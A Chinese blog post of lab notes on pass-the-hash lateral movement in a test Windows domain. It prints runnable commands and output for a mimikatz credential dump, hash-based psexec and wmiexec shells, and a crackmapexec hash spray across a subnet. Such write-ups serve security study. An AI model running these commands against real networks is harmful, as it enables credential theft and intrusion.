【PTH(pass the hash) 哈希传递】

已于 2024-12-05 17:16:00 修改
阅读量1k 收藏 12
点赞数 22
分类专栏: 内网漫游 文章标签: 哈希算法 算法
于 2024-09-12 11:56:12 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_64237310/article/details/142150011
版权

文章目录

环境:

  • win7 192.168.177.134/24
  • kali 192.168.177.129/24
  • 12server-01 192.168.177.119/24
  • 12server-dc 192.168.177.120/24

原理

  • pass-the-hash 在内网渗透中是一种很经典的攻击方式,因为黑客可以直接通过 LM Hash 和 NTLM Hash 访问远程主机或服务,而不用提供明文密码。
  • 在 Windows 系统中,通常会使用 NTLM 身份认证。
  • NTLM 认证不使用明文口令,而是使用口令加密后的hash 值,hash 值由系统 API 生成(例如 LsaLogonUser)。
  • hash 分为 LM hash 和 NT hash,如果密码长度大于15,那么无法生成LMhash。从 Windows Vista 和 Windows Server 2008 开始,微软默认禁用LMhash。
  • 如果攻击者获得了 hash,就能够在身份验证的时候模拟该用户。

mimikatz

在 12server-01 运行以下命令获取 NTLM
C:\Users\test\Desktop\mimikatz_trunk\x64>mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">password.txt
在这里插入图片描述
在 12server-01 上以管理员权限使用 mimikatz,hash利用上面获取的,成功调出终端
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:e19ccf75ee54e06b06a5907af13cef42
在这里插入图片描述

在其他主机上用这个 NTLM 好像也能调出终端,但我遇见点小问题,所以这里没成功。

psexec

psexec 是 windows 官方自带的,不存在查杀问题。
在 pstools 中利用 psexec 可以在远程计算机上执行命令,其基本原理:通过管道在远程目标主机上创建一个 psexec 服务,并在本地生成一个 psexesvc 的二进制文件,然后通过 psexec 服务运行命令,运行结束后删除服务。
利用 SMB 服务可以通过明文或 hash 传递来远程执行,前提条件:445 服务端口开放(相当于开放了 smb 协议)。

注意事项

  • 远程系统开启 admin$ 开启(默认开启)
  • 因为 psexec 连接的原理是基于 IPC 共享的,因此目标需要开放 445 端口
  • 在使用 psexec 执行远程命令式,会在目标系统创建一个 psexec 的服务,命令执行完后,psexec 服务将被自动删除。由于创建或删除服务时会产生大量的日志,因此蓝队在溯源时可以通过日志反推攻击流程。
  • 使用 PsExec 可以直接获得 System 权限的交互式 Shell 的前提目标是administrator 权限的 shell
  • 在域环境测试时发现,非域用户无法利用内存中的票据使用PsExec 功能,只能依靠账号和密码进行传递。

方法一

win7 使用 PsExec 工具远程连接 12server-01 服务器。
PsExec.exe /accepteula /s \\192.168.177.119 -u Administrator -p P@ssw0rd cmd
在这里插入图片描述

方法二

登录域成员
在 kali 中用 impacket 包下的 psexec 结合 NTLM 调出终端

┌──(root㉿lihao)-[~/Desktop/impacket-master/examples]
└─# python3 psexec.py -hashes aaaa:e19ccf75ee54e06b06a5907af13cef42 ./Administrator@192.168.177.119
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on 192.168.177.119.....
[*] Found writable share ADMIN$
[*] Uploading file CTfKaEwM.exe
[*] Opening SVCManager on 192.168.177.119.....
[*] Creating service dyYx on 192.168.177.119.....
[*] Starting service dyYx.....
[!] Press help for extra shell commands
Microsoft Windows [░µ▒╛ 6.3.9600]
(c) 2013 Microsoft Corporationíú▒ú┴⌠╦∙╙╨╚¿└√íú

C:\Windows\system32>ipconfig
 
Windows IP ┼Σ╓├


╥╘╠½═°╩╩┼Σ╞≈ Ethernet0:

   ┴¼╜╙╠╪╢¿╡─ DNS ║≤╫║ . . . . . . . : 
   ▒╛╡╪┴┤╜╙ IPv6 ╡╪╓╖. . . . . . . . : fe80::64b0:83c8:1d58:44eb%12
   IPv4 ╡╪╓╖ . . . . . . . . . . . . : 192.168.177.119
   ╫╙═°╤┌┬δ  . . . . . . . . . . . . : 255.255.255.0
   ─¼╚╧═°╣╪. . . . . . . . . . . . . : 192.168.177.2

╦φ╡└╩╩┼Σ╞≈ isatap.{DA36902B-CF3E-482E-A260-6E8DE6295090}:

   ├╜╠σ╫┤╠¼  . . . . . . . . . . . . : ├╜╠σ╥╤╢╧┐¬
   ┴¼╜╙╠╪╢¿╡─ DNS ║≤╫║ . . . . . . . :

登录域控

┌──(root㉿lihao)-[~/Desktop/impacket-master/examples]
└─# python3 psexec.py moonsec/Administrator@192.168.177.120
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[*] Requesting shares on 192.168.177.120.....
[*] Found writable share ADMIN$
[*] Uploading file BoHrJhLr.exe
[*] Opening SVCManager on 192.168.177.120.....
[*] Creating service fsqM on 192.168.177.120.....
[*] Starting service fsqM.....
[!] Press help for extra shell commands
Microsoft Windows [░µ▒╛ 6.3.9600]
(c) 2013 Microsoft Corporationíú▒ú┴⌠╦∙╙╨╚¿└√íú

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>ipconfig
 
Windows IP ┼Σ╓├


╥╘╠½═°╩╩┼Σ╞≈ Ethernet0:

   ┴¼╜╙╠╪╢¿╡─ DNS ║≤╫║ . . . . . . . : 
   ▒╛╡╪┴┤╜╙ IPv6 ╡╪╓╖. . . . . . . . : fe80::8013:6c69:3dcc:c4cf%12
   IPv4 ╡╪╓╖ . . . . . . . . . . . . : 192.168.177.120
   ╫╙═°╤┌┬δ  . . . . . . . . . . . . : 255.255.255.0
   ─¼╚╧═°╣╪. . . . . . . . . . . . . : 192.168.177.2

╦φ╡└╩╩┼Σ╞≈ isatap.{73872ACF-A392-4C0C-B7FE-84F1C096DB1D}:

   ├╜╠σ╫┤╠¼  . . . . . . . . . . . . : ├╜╠σ╥╤╢╧┐¬
   ┴¼╜╙╠╪╢¿╡─ DNS ║≤╫║ . . . . . . . : 

C:\Windows\system32>

方法三

建立 IPC$

C:\Users\CISP>net use \\192.168.177.119\ipc$ "P@ssw0rd" /user:administrator
命令成功完成。

C:\Users\CISP>dir \\192.168.177.119\c$
 驱动器 \\192.168.177.119\c$ 中的卷没有标签。
 卷的序列号是 4E38-4215

 \\192.168.177.119\c$ 的目录

2013/08/22  23:52    <DIR>          PerfLogs
2024/08/26  15:01    <DIR>          Program Files
2013/08/22  23:39    <DIR>          Program Files (x86)
2024/09/10  21:15    <DIR>          Users
2024/09/11  21:58    <DIR>          Windows
               0 个文件              0 字节
               5 个目录 52,824,035,328 可用字节

建立 IPC$ 连接后再调用终端就不用账密了,但是我这里调不出来,闪退
在这里插入图片描述

利用 msf hash 模块

先跳过了
在这里插入图片描述

crackmapexec

CrackMapExec 可以对 C 段中的主机进行批量 pth。

┌──(root㉿lihao)-[~/Desktop/impacket-master/examples]
└─# crackmapexec smb 192.168.177.0/24 -u administrator -H e19ccf75ee54e06b06a5907af13cef42  
SMB         192.168.177.1   445    DORAEMON0358     [*] Windows 11 Build 22621 x64 (name:DORAEMON0358) (domain:Doraemon0358) (signing:False) (SMBv1:False)
SMB         192.168.177.1   445    DORAEMON0358     [-] Doraemon0358\administrator:e19ccf75ee54e06b06a5907af13cef42 STATUS_LOGON_FAILURE 
SMB         192.168.177.120 445    12SERVER-DC      [*] Windows Server 2012 R2 Standard 9600 x64 (name:12SERVER-DC) (domain:moonsec.fbi) (signing:True) (SMBv1:True)
SMB         192.168.177.119 445    12SERVER-01      [*] Windows Server 2012 R2 Standard 9600 x64 (name:12SERVER-01) (domain:moonsec.fbi) (signing:False) (SMBv1:True)
SMB         192.168.177.120 445    12SERVER-DC      [+] moonsec.fbi\administrator:e19ccf75ee54e06b06a5907af13cef42 (Pwn3d!)
SMB         192.168.177.134 445    CISP-PC          [*] Windows 7 Ultimate 7601 Service Pack 1 x64 (name:CISP-PC) (domain:CISP-PC) (signing:False) (SMBv1:True)
SMB         192.168.177.119 445    12SERVER-01      [+] moonsec.fbi\administrator:e19ccf75ee54e06b06a5907af13cef42 (Pwn3d!)
SMB         192.168.177.134 445    CISP-PC          [-] CISP-PC\administrator:e19ccf75ee54e06b06a5907af13cef42 STATUS_LOGON_FAILURE

命令

-H e19ccf75ee54e06b06a5907af13cef42:指定要尝试的 NTLM 哈希值。这是一个用于认证的密码哈希值

  1. SMB 192.168.177.1 445 DORAEMON0358 [*] Windows 11 Build 22621 x64 (name:DORAEMON0358) (domain:Doraemon0358) (signing:False) (SMBv1:False)

    • IP 地址192.168.177.1
    • 端口445(SMB 的默认端口)
    • 计算机名称DORAEMON0358
    • 状态[*] 表示发现了一个 SMB 服务正在运行
    • 系统信息:Windows 11 Build 22621 x64
    • 域名:Doraemon0358
    • 签名:False(SMB 签名未启用)
    • SMB 版本:SMBv1 未启用

    认证结果Doraemon0358\administrator:e19ccf75ee54e06b06a5907af13cef42 STATUS_LOGON_FAILURE 表示提供的哈希值无法成功登录。

  2. SMB 192.168.177.120 445 12SERVER-DC [*] Windows Server 2012 R2 Standard 9600 x64 (name:12SERVER-DC) (domain:moonsec.fbi) (signing:True) (SMBv1:True)

    • IP 地址192.168.177.120
    • 计算机名称12SERVER-DC
    • 系统信息:Windows Server 2012 R2 Standard 9600 x64
    • 域名:moonsec.fbi
    • 签名:True(SMB 签名启用)
    • SMB 版本:SMBv1 启用

    认证结果moonsec.fbi\administrator:e19ccf75ee54e06b06a5907af13cef42 (Pwn3d!) 表示提供的哈希值成功登录,并且账户被标记为“Pwn3d” (被攻陷)。

  3. SMB 192.168.177.119 445 12SERVER-01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:12SERVER-01) (domain:moonsec.fbi) (signing:False) (SMBv1:True)

    • IP 地址192.168.177.119
    • 计算机名称12SERVER-01
    • 系统信息:Windows Server 2012 R2 Standard 9600 x64
    • 域名:moonsec.fbi
    • 签名:False(SMB 签名未启用)
    • SMB 版本:SMBv1 启用

    认证结果moonsec.fbi\administrator:e19ccf75ee54e06b06a5907af13cef42 (Pwn3d!) 表示提供的哈希值成功登录,并且账户被标记为“Pwn3d”。

  4. SMB 192.168.177.134 445 CISP-PC [*] Windows 7 Ultimate 7601 Service Pack 1 x64 (name:CISP-PC) (domain:CISP-PC) (signing:False) (SMBv1:True)

    • IP 地址192.168.177.134
    • 计算机名称CISP-PC
    • 系统信息:Windows 7 Ultimate 7601 Service Pack 1 x64
    • 域名:CISP-PC
    • 签名:False(SMB 签名未启用)
    • SMB 版本:SMBv1 启用

    认证结果CISP-PC\administrator:e19ccf75ee54e06b06a5907af13cef42 STATUS_LOGON_FAILURE 表示提供的哈希值无法成功登录。

WMI

WMI 全称Windows Management Instrumentation即 Windows 管理工具,Windows 98 以后的操作系统都支持 WMI。
由于 Windows 默认不会将 WMI 的操作记录在日志里,同时现在越来越多的杀软将 PsExec 加入了黑名单,因此 WMI 比 PsExec 隐蔽性要更好一些。

wmic 命令

在终端中用 wmic 执行命令,将执行结果保存在目标主机;之后建立 IPC$,使用 type 读取执行结果。
使用 wmic 连接远程主机,需要目标主机开放 135 端口(wmic 默认的管理端口),445 端口(wmicexec 使用此端口传回显)。
但是我又遇到问题了(写到 12server01 上了呀,但找不见),先跳过
在这里插入图片描述
在这里插入图片描述

wmiexec.py

利用 kali 上的 impacket 包里的 wmiexec.py 脚本获取 shell

┌──(root㉿lihao)-[~/Desktop/impacket-master/examples]
└─# python3 wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42 Administrator@192.168.177.119 "whoami"  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
12server-01\administrator

获取明文 shell

┌──(root㉿lihao)-[~/Desktop/impacket-master/examples]
└─#  python3 wmiexec.py administrator:P@ssw0rd@192.168.177.119
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
12server-01\administrator

C:\>

wmiexec.vbs

利用 wmiexec.vbs 脚本(脚本通过 VBS 调用 wmi 来模拟 psexec 的功能)

C:\Users\CISP>cd Desktop

C:\Users\CISP\Desktop>cscript //nologo wmiexec.vbs /shell 192.168.177.119 admini
strator P@ssw0rd
WMIEXEC : Target -> 192.168.177.119
WMIEXEC : Connecting...
WMIEXEC : Login -> OK
WMIEXEC : Result File -> C:\wmi.dll
WMIEXEC : Share created sucess.
WMIEXEC : Share Name -> WMI_SHARE
WMIEXEC : Share Path -> C:\
C:\Windows\system32>ipconfig

Windows IP 配置


以太网适配器 Ethernet0:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::64b0:83c8:1d58:44eb%12
   IPv4 地址 . . . . . . . . . . . . : 192.168.177.119
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.177.2

隧道适配器 isatap.{DA36902B-CF3E-482E-A260-6E8DE6295090}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

C:\Windows\system32>

使用 vmiexec.vbs 执行单条命令

C:\Users\CISP\Desktop>cscript wmiexec.vbs /cmd 192.168.177.119 administrator P@s
sw0rd "ipconfig"
Microsoft (R) Windows Script Host Version 5.8
版权所有(C) Microsoft Corporation 1996-2001。保留所有权利。

WMIEXEC : Target -> 192.168.177.119
WMIEXEC : Connecting...
WMIEXEC : Login -> OK
WMIEXEC : Result File -> C:\wmi.dll
WMIEXEC ERROR: Share could not be created.
WMIEXEC ERROR: Return value -> 22
WMIEXEC ERROR: Share Name Already In Used!

        192.168.177.119  >>  ipconfig

Windows IP 配置


以太网适配器 Ethernet0:

   连接特定的 DNS 后缀 . . . . . . . :
   本地链接 IPv6 地址. . . . . . . . : fe80::64b0:83c8:1d58:44eb%12
   IPv4 地址 . . . . . . . . . . . . : 192.168.177.119
   子网掩码  . . . . . . . . . . . . : 255.255.255.0
   默认网关. . . . . . . . . . . . . : 192.168.177.2

隧道适配器 isatap.{DA36902B-CF3E-482E-A260-6E8DE6295090}:

   媒体状态  . . . . . . . . . . . . : 媒体已断开
   连接特定的 DNS 后缀 . . . . . . . :

WMIEXEC : Share deleted sucess.

C:\Users\CISP\Desktop>

其他

Invoke-WmiCommand.ps1PowerSploit工具包里的一部分,该脚本是利用Powershell 调用 WMI 来远程执行命令。
Invoke-WMIMethodPowerShell 自带的一个模块,也可以用它来连接远程计算机执行命令和指定程序。
wmic 还有一些其他命令

参考:暗月师傅

内网渗透(三十七)之横向移动篇-Pass the Hash 哈希传递攻击(PTH)横向移动
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-17 643
主流的Windows操作系统,通常会使用 NTLM Hash对访问资源的用户进行身份验证。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本 地管理员账号和码,因此,如果计算机的本地管理员账号和码也是相同的,攻击者就能使用哈希传递攻击的方法登 录内网中的其他计算机。在Windows网络中,散列值就是用来证明身份的(有正确的用户名和码散列值,就能通过验证),而微软自己的产品和 工具显然不会支持这种攻击,于是,攻击者往往会使用第三方工具来完成任务。
[横向移动] Pass The HashPTH哈希传递攻击横向移动
Blue17 の 小窝
03-18 1019
而在 Windows 网络中,散列值是用来证明用户身份的(有正确的用户名和码散列值,就能通过验证),而微软自己的产品和工具显然不会支持这种攻击,所以,通常情况下攻击者会采用第三方工具来完成攻击。在上面那个方法中,我们 PTH 攻击成功后,还得远程桌面到靶机上,然后通过 IPC$ 才能横向移动,既麻烦,动作又大,那么有没有啥简单的方法来通过 PTH 上线内网其它机器呢?当用户需要登录某网站时,如果该网站使用明文的方式保存了用户的码,那么,一旦该网站出现了安全漏洞,所有用户的明文码就均会被泄露出去。
哈希传递PTH
A526847的博客
05-31 1579
假设这么一种情况,我们已拿到的域内所有的账户Hash,包括 krbtgt账户,由于有些原因导致你对域管权限丢失,但好在你还有一个普通域用户权限,碰巧管理员在域 内加固时忘记重置krbtgt码,基于此条件,我们还能利用该票据重新获得域管理员权限,利用krbtgt的 HASH值可以伪造生成任意的TGT(mimikatz),能够绕过对任意用户的账号策略,让用户成为任意组的成 员,可用于Kerberos认证的任何服务。白银票据就是伪造的ST。但是普通的金票不能够跨域使用,也就是说金票的权限被限制在当前域内。
内网渗透之横向渗透PTH(pass-the-hash) HASH 传递()
2303_78851087的博客
03-13 439
内网渗透之横向渗透PTH(pass-the-hash) HASH 传递()
渗透测试的域渗透之哈希传递攻击PTH
没有网络安全就没有国家安全
03-13 1392
渗透测试的域渗透之哈希传递攻击PTH
个人简单笔记,后渗透学习之Passing the Hash哈希传递
来到了学渣的博客
02-25 699
Passing the Hash Hash基础知识 Window系统下的Hash码格式为: 用户名称:RID:LM-Hash值:NT-Hash值 获取Hash值 我自己暂时所知道的三种方法 Hashdump Run post/windows/gather/smart_hashdump use post/windows/gather/hashdump 前提是要获得shell,获shell方法在...
hash传递pth
m0_74326506的博客
09-09 527
hash传递,不需要明文码即可登陆。
渗透测试--Windows下的哈希传递攻击pth&票据传递统计ptt
weixin_44368093的博客
12-03 587
在渗透测试过程中,我们一旦拿下一台windows主机,总是获取搜索凭证的。一旦我们搜索到NTLM等凭证,我们就可以尝试传递攻击了。而本片文章就是专门针对传递攻击,做的一次总结。主要有以下内容(下面的很多内容包含恶意文件,请各位大侠自行免杀
pth(pass the hash)哈希传递攻击
http://www.gov.cn/xinwen/2016-11/07/content_5129723.htm
10-09 3137
pth(pass-the-hash)哈希传递攻击在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文码域/工作组环境账号hash内网中存在和当前机器相同的(ps:微软打了KB22871997补丁后只有Administrator(SID 500)可以PTH成功,默认windows server 2012后都会存在补丁)
内网横传之哈希传递Pass The Hash
11-25 8255
本文主要讲述如何使用msf 进行hash 传递以及遇到的一些问题
4.8-PasstheHash哈希传递攻击(PTH)横向移动
qq_38122566的博客
03-17 1033
大多数渗透测试人员都听说过哈希传递(Pass The Hash)攻击。该方法通过找到与账户相关的码散列值(通常是NTLM Hash)来进行攻击。在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和码,因此,如果计算机的本地管理员账号和码也是相同的,攻击者就能使用哈希传递攻击的方法登录内网中的其他计算机。同时,通过哈希传递攻击,攻击者不需要花时间破解码散列值(进而获得明文)
横向渗透之哈希传递(PTH)
qq_46258964的博客
05-08 2151
哈希传递PTH PTH,即Pass The Hash,通过找到与账号相关的码散列值(通常是NTLM Hash)来进行攻击。 在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和码。 因此,如果计算机的本地管理员账号和码也是相同的,攻击者就可以使用哈希传递的方法登录到内网主机的其他计算机。 kb2871997,禁止了本地管理员进行远程连接,从而组织了管理员权限执行wmi,psexec等危险命令, 但是这个补丁不知道为什么漏了一个默认(user SID=500)本
哈希传递攻击Pass-the-Hash
热门推荐
whoim_i的博客
12-25 1万+
目录使用msf进行哈希传递攻击使用mimikatz进行哈希传递攻击PTH(工作组) 使用msf进行哈希传递攻击 有些时候,当我们获取到了某台主机的Administrator用户的LM-Hash和 NTLM-Hash ,并且该主机的445端口(文件共享)打开着。我们则可以利用 exploit/windows/smb/psexec 漏洞用MSF进行远程登录(哈希传递攻击)(注意:只能是adminis...
域渗透之Pass-the-hash
ToyCarryYou的博客
04-24 1234
域渗透 什么是AD域 AD的全称是Active Directory(活动目录) 是指windows服务器操作系统中的目录服务,它被包含在大多数windows sever操作系统中,负责集中式域管理及身份认证。AD域中是每个Windows域网络的基石。他负责存储域成员(包括设备和用户)的信息,验证其凭据并定义访问权限。运行此服务的服务器称为域控制器。AD域架构的常用对象包括以下四种 1.**组织单位...
PTH横向移动
网络安全。
02-24 5184
0x01 简介 PTH全称“pass the hash”,即hash传递PTH通过smb服务进行,走445端口。 0x02 通过PTH横向移动 一、通过cobaltstrike进行PTH 1、在已上线机器中直接dir访问目标系统C盘,提示没权限。 beacon> shell dir \192.168.3.123\c$ 2、此处使用先前已获取的hash对目标administrator用户...
内网渗透TIPS总结
Javachichi的博客
03-13 862
更可靠:更少的宕机时间。可以简单的把域理解成升级版的“工作组”,相比工作组而言,它有一个更加严格的安全管理控制机制,如果你想访问域内的资源,就必须拥有一个合法的身份登陆到该域中,而你对该域内的资源拥有什么样的权限,还需要取决于你在该域中的用户身份。通过域成员主机,定位出 域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员码,进而拿下域控制器、渗透整个内网。
内网渗透笔记
haoge1998的博客
05-06 2663
内网渗透思路 ​ 通过域成员主机,定位出域控制器 IP 及域管理员账号,利用域成员主机作为跳板,扩大渗透范围,利用域管理员可以登陆域中任何成员主机的特性,定位出域管理员登陆过的主机 IP,设法从域成员主机内存中 dump 出域管理员码,进而拿下域控制器、渗透整个内网。 内网基础知识 1、工作组: 工作组是局域网中的一个概念,他是长久的资源管理模式。默认情况下使用工作组方式进行资源管理,将不同的 computer 按照不同的要求分类到不同的组。 2、域: 用来描述一种架构,和“工作组”相对应,由工作组升级而
Kali工具集-利用pth-rpcclient进行pass-the-hash攻击
最新发布
qq_46487664的博客
05-21 1394
本实验旨在通过模拟网络环境中的一次典型的Pass-the-HashPtH攻击,帮助学生理解Windows系统中用户身份验证机制的弱点以及如何利用哈希值进行横向渗透。实验将使用pwdump8工具从目标主机提取用户哈希,并通过SMB协议共享文件传输至攻击机,最后使用pth-rpcclient工具完成基于哈希的身份验证绕过攻击
内网渗透PTH(pass-the-hash)
https://www.cnblogs.com/zpchcbd/
09-11 1754
pass-the-hash在内网渗透中是一种很经典的攻击方式,原理就是攻击者可以直接通过LM Hash和NTLM Hash访问远程主机或服务,而不用提供明文码。 pass the hash原理: 在Windows系统中,通常会使用NTLM身份认证,NTLM认证不使用明文口令,而是使用口令加后的hash值,hash值由系统API生成(例如LsaLogonUser) ,其中hash(哈希)分为...
掌握Pass-the-Hash攻击与防护技术
Pass-the-HashPtH)是一种网络攻击技术,攻击者通过利用系统中的哈希值而不是明文码进行认证,从而绕过安全控制措施。这种技术主要针对使用哈希值存储码的认证机制,常见于Windows操作系统的本地或网络认证...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值